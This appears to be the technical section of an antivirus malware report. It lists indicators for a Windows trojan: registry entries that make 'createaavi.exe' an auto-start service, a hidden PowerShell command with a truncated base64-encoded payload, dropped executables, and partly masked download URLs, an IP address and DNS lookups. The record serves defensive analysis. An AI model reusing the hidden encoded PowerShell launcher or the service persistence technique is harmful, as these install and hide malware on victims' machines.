Technical information
- [<HKLM>\System\CurrentControlSet\Services\createaavi] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\createaavi] 'ImagePath' = '"%WINDIR%\SysWOW64\createaavi.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABIAGkAYwByAHoAdABmAGIAcQBpAHgAPQAnAEsAcwB1AG0AZAB0AHgAawB1ACcAOwAkAEwAcABvAHoAdwB2AGoAdQAgAD0AIAAnADYAMQAzACcAOwAkAEcAegBpAG0AZQBnAGIAbwBtAD0AJwBaAHIAbABhAHkAbAB5AHUAZgB0AGoAZAB...
- %HOMEPATH%\613.exe
- %HOMEPATH%\613.exe to %WINDIR%\syswow64\createaavi.exe
- http://sc#####rofessional.info/plugins/266-wcvu9ml-67633827/
- http://72.##6.87.136/6LhxIQDs6ov4EeUj
- DNS ASK do####qiuqiu.vip
- DNS ASK sc#####rofessional.info
- '%HOMEPATH%\613.exe'
- '%WINDIR%\syswow64\createaavi.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABIAGkAYwByAHoAdABmAGIAcQBpAHgAPQAnAEsAcwB1AG0AZAB0AHgAawB1ACcAOwAkAEwAcABvAHoAdwB2AGoAdQAgAD0AIAAnADYAMQAzACcAOwAkAEcAegBpAG0AZQBnAGIAbwBtAD0AJwBaAHIAbABhAHkAbAB5AHUAZgB0AGoAZAB...' (with a hidden window)